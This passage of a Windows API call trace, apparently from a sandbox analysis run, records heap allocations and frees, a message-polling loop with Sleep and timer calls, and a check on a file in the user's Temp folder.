RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0315.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0315.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0315.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0315.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0315.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0315.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0315.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0315.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0315.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0315.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0315.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0315.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0315.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0315.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0315.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0315.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0315.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0315.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0315.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0315.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0315.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0315.926] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0315.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0315.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0315.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0315.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0315.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0315.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0315.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0315.927] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0315.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0315.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0315.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0315.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0315.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0315.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0315.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0315.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0315.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0315.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0315.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0315.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0315.927] timeGetTime () returned 0x4ed88 [0315.927] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.928] Sleep (dwMilliseconds=0xa) [0315.932] timeGetTime () returned 0x4ed97 [0315.932] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.932] Sleep (dwMilliseconds=0xa) [0315.947] timeGetTime () returned 0x4eda7 [0315.947] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.947] Sleep (dwMilliseconds=0xa) [0315.968] timeGetTime () returned 0x4edb7 [0315.968] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.968] Sleep (dwMilliseconds=0xa) [0315.978] timeGetTime () returned 0x4edc6 [0315.978] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.978] Sleep (dwMilliseconds=0xa) [0315.994] timeGetTime () returned 0x4edd6 [0315.994] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0315.994] Sleep (dwMilliseconds=0xa) [0316.009] timeGetTime () returned 0x4ede5 [0316.009] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.010] Sleep (dwMilliseconds=0xa) [0316.025] timeGetTime () returned 0x4edf5 [0316.025] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.025] Sleep (dwMilliseconds=0xa) [0316.041] timeGetTime () returned 0x4ee05 [0316.041] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.041] Sleep (dwMilliseconds=0xa) [0316.056] timeGetTime () returned 0x4ee14 [0316.056] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.056] Sleep (dwMilliseconds=0xa) [0316.072] timeGetTime () returned 0x4ee24 [0316.072] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.072] Sleep (dwMilliseconds=0xa) [0316.088] timeGetTime () returned 0x4ee33 [0316.088] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0316.088] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0316.088] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0316.088] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0316.088] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0316.088] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.088] Sleep (dwMilliseconds=0xa) [0316.103] timeGetTime () returned 0x4ee43 [0316.103] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.103] Sleep (dwMilliseconds=0xa) [0316.119] timeGetTime () returned 0x4ee53 [0316.119] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.119] Sleep (dwMilliseconds=0xa) [0316.134] timeGetTime () returned 0x4ee62 [0316.135] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.135] Sleep (dwMilliseconds=0xa) [0316.150] timeGetTime () returned 0x4ee72 [0316.150] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.150] Sleep (dwMilliseconds=0xa) [0316.165] timeGetTime () returned 0x4ee81 [0316.166] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.166] Sleep (dwMilliseconds=0xa) [0316.181] timeGetTime () returned 0x4ee91 [0316.181] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.181] Sleep (dwMilliseconds=0xa) [0316.197] timeGetTime () returned 0x4eea1 [0316.197] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.197] Sleep (dwMilliseconds=0xa) [0316.212] timeGetTime () returned 0x4eeb0 [0316.212] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.213] Sleep (dwMilliseconds=0xa) [0316.228] timeGetTime () returned 0x4eec0 [0316.228] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.228] Sleep (dwMilliseconds=0xa) [0316.244] timeGetTime () returned 0x4eecf [0316.244] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.244] Sleep (dwMilliseconds=0xa) [0316.261] timeGetTime () returned 0x4eedf [0316.261] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.261] Sleep (dwMilliseconds=0xa) [0316.275] timeGetTime () returned 0x4eeef [0316.275] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.275] Sleep (dwMilliseconds=0xa) [0316.290] timeGetTime () returned 0x4eefe [0316.290] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.290] Sleep (dwMilliseconds=0xa) [0316.306] timeGetTime () returned 0x4ef0e [0316.306] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.306] Sleep (dwMilliseconds=0xa) [0316.322] timeGetTime () returned 0x4ef1d [0316.322] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.322] Sleep (dwMilliseconds=0xa) [0316.338] timeGetTime () returned 0x4ef2d [0316.338] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.338] Sleep (dwMilliseconds=0xa) [0316.353] timeGetTime () returned 0x4ef3d [0316.353] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.353] Sleep (dwMilliseconds=0xa) [0316.368] timeGetTime () returned 0x4ef4c [0316.368] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.368] Sleep (dwMilliseconds=0xa) [0316.384] timeGetTime () returned 0x4ef5c [0316.384] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.384] Sleep (dwMilliseconds=0xa) [0316.400] timeGetTime () returned 0x4ef6b [0316.400] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.400] Sleep (dwMilliseconds=0xa) [0316.415] timeGetTime () returned 0x4ef7b [0316.415] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.415] Sleep (dwMilliseconds=0xa) [0316.431] timeGetTime () returned 0x4ef8b [0316.431] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.431] Sleep (dwMilliseconds=0xa) [0316.446] timeGetTime () returned 0x4ef9a [0316.446] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.446] Sleep (dwMilliseconds=0xa) [0316.462] timeGetTime () returned 0x4efaa [0316.462] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.462] Sleep (dwMilliseconds=0xa) [0316.478] timeGetTime () returned 0x4efb9 [0316.478] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.478] Sleep (dwMilliseconds=0xa) [0316.493] timeGetTime () returned 0x4efc9 [0316.493] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.493] Sleep (dwMilliseconds=0xa) [0316.509] timeGetTime () returned 0x4efd9 [0316.509] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.509] Sleep (dwMilliseconds=0xa) [0316.524] timeGetTime () returned 0x4efe8 [0316.524] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.524] Sleep (dwMilliseconds=0xa) [0316.540] timeGetTime () returned 0x4eff8 [0316.540] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.540] Sleep (dwMilliseconds=0xa) [0316.556] timeGetTime () returned 0x4f007 [0316.556] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.556] Sleep (dwMilliseconds=0xa) [0316.571] timeGetTime () returned 0x4f017 [0316.571] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.571] Sleep (dwMilliseconds=0xa) [0316.589] timeGetTime () returned 0x4f027 [0316.589] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.589] Sleep (dwMilliseconds=0xa) [0316.602] timeGetTime () returned 0x4f036 [0316.602] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.602] Sleep (dwMilliseconds=0xa) [0316.618] timeGetTime () returned 0x4f046 [0316.618] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.618] Sleep (dwMilliseconds=0xa) [0316.634] timeGetTime () returned 0x4f055 [0316.634] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.634] Sleep (dwMilliseconds=0xa) [0316.649] timeGetTime () returned 0x4f065 [0316.649] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.649] Sleep (dwMilliseconds=0xa) [0316.665] timeGetTime () returned 0x4f075 [0316.665] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.665] Sleep (dwMilliseconds=0xa) [0316.681] timeGetTime () returned 0x4f084 [0316.681] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.681] Sleep (dwMilliseconds=0xa) [0316.696] timeGetTime () returned 0x4f094 [0316.696] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.696] Sleep (dwMilliseconds=0xa) [0316.712] timeGetTime () returned 0x4f0a3 [0316.712] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.712] Sleep (dwMilliseconds=0xa) [0316.728] timeGetTime () returned 0x4f0b3 [0316.728] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.728] Sleep (dwMilliseconds=0xa) [0316.743] timeGetTime () returned 0x4f0c3 [0316.743] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.743] Sleep (dwMilliseconds=0xa) [0316.758] timeGetTime () returned 0x4f0d2 [0316.758] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.758] Sleep (dwMilliseconds=0xa) [0316.775] timeGetTime () returned 0x4f0e2 [0316.775] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.775] Sleep (dwMilliseconds=0xa) [0316.798] timeGetTime () returned 0x4f0f1 [0316.798] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.798] Sleep (dwMilliseconds=0xa) [0316.805] timeGetTime () returned 0x4f101 [0316.805] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.805] Sleep (dwMilliseconds=0xa) [0316.821] timeGetTime () returned 0x4f111 [0316.821] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.821] Sleep (dwMilliseconds=0xa) [0316.836] timeGetTime () returned 0x4f120 [0316.836] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.836] Sleep (dwMilliseconds=0xa) [0316.852] timeGetTime () returned 0x4f130 [0316.852] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0316.852] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0316.852] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0316.852] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0316.852] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0316.852] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.852] Sleep (dwMilliseconds=0xa) [0316.868] timeGetTime () returned 0x4f13f [0316.868] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.868] Sleep (dwMilliseconds=0xa) [0316.883] timeGetTime () returned 0x4f14f [0316.883] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.883] Sleep (dwMilliseconds=0xa) [0316.899] timeGetTime () returned 0x4f15f [0316.899] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.899] Sleep (dwMilliseconds=0xa) [0316.914] timeGetTime () returned 0x4f16e [0316.914] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0316.914] Sleep (dwMilliseconds=0xa) [0316.930] timeGetTime () returned 0x4f17e [0316.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0316.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0316.930] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0316.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0316.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0316.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0316.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0316.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0316.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0316.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0316.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0316.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0316.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0316.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0316.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0316.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0316.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0316.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0316.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0316.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0316.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0316.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0316.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0316.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0316.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0316.932] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0316.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0316.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0316.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0316.932] RtlAllocateHeap 